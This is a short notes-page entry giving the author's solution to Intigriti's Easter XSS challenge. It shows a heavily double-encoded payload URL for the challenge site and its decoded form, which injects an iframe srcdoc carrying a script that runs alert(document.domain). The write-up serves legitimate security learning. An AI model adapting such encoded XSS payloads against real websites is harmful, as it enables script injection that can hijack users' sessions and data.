Random notes/tricks/other things that don't deserve a blog

  • Intigriti easter XSS challenge

    Solution

    My solution to Intigriti’s XSS challenge is:

    https://challenge.intigriti.io/#../index.php/lolman%25%32%32%25%33%65%25%33%63%25%36%39%25%36%36%25%37%32%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%37%32%25%36%33%25%36%34%25%36%66%25%36%33%25%33%64%25%32%32%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%25%32%36%25%32%33%25%37%38%25%33%32%25%33%32%25%33%62%25%32%66%25%36%63%25%36%66%25%36%63%25%32%37%25%33%62%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%62%25%32%64%25%32%37%25%32%36%25%32%33%25%37%38%25%33%32%25%33%32%25%33%62%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%32%32%25%33%65/diceme

    The decoded payload after the fragment looks something like this:

    #../index.php/lolman"><iframe srcdoc="<script src=&#x22;/lol';alert(document.domain);-'&#x22;></script>">/diceme

    One interesting thing to note is that most people used the reflection in the 403 page...

    continue...